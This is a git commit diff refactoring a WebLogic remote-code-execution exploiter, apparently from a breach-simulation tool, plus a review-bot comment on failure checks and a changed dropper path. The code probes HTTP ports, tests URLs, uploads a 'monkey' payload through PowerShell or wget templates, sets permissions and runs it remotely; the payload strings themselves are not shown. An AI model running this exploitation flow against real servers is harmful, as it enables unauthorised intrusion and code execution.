Webblogic refactored to web RCE framework changes(from static methods into class methods)

Vakaris 2018-08-17 13:46:14 +03:00
parent 66bc852742
commit 10528c313d
1 changed files with 10 additions and 18 deletions


@ -10,7 +10,7 @@ from requests import post, exceptions
from web_rce import WebRCE from web_rce import WebRCE
from exploit.tools import get_free_tcp_port, get_interface_to_target from exploit.tools import get_free_tcp_port, get_interface_to_target
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD
import threading import threading
import logging import logging
@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host): def __init__(self, host):
super(WebLogicExploiter, self).__init__(host) super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey-32.exe',
'win64': 'monkey-64.exe'})
def exploit_host(self): def exploit_host(self):
# Get open ports # Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) ports = self.get_ports_w(self.HTTP, ["http"])
if not ports: if not ports:
return False return False
# Get urls to try to exploit # Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports, URLS) urls = self.build_potential_urls(ports, URLS)
exploiter = self.exploit
# Checking takes a lot of time, so we check until we get exploitable url and stop # Checking takes a lot of time, so we check until we get exploitable url and stop
vulnerable_urls = [] vulnerable_urls = []
@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE):
if not vulnerable_urls: if not vulnerable_urls:
return False return False
# Somehow we can't save files outside server's directory data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = 'monkey-32.exe'
config.dropper_target_path_win_64 = 'monkey-64.exe'
config.dropper_target_path_linux = './monkey.sh'
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0],
{'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED,
'linux': WGET_HTTP_UPLOAD})
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if not data or data['response'] == False: if not data or data['response'] is False:
return False return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False: if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
return False return False
return True return True
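Review bot: The three `is False` checks in `exploit_host` (on `data['response']`, `change_permissions(...)` and `execute_remote_monkey(...)`) only match the literal `False`, so a helper that returns `None` on some failure path would be treated as success and the method would go on to `return True`. The `WebRCE` helpers are not visible on this page, so their return contract should be confirmed and stated next to the checks, e.g. `# WebRCE helpers return False on failure, never None`. Separately, the path dict now passed to `super(WebLogicExploiter, self).__init__` carries no explanation: the removed comment said files could not be saved outside the server's directory, yet the linux entry changed from `./monkey.sh` to `/tmp/monkey.sh`, so a one-line comment saying whether that constraint still holds would help the next maintainer. `exploit_host` spans the second and third hunks and the URL-checking loop between them is outside what is shown.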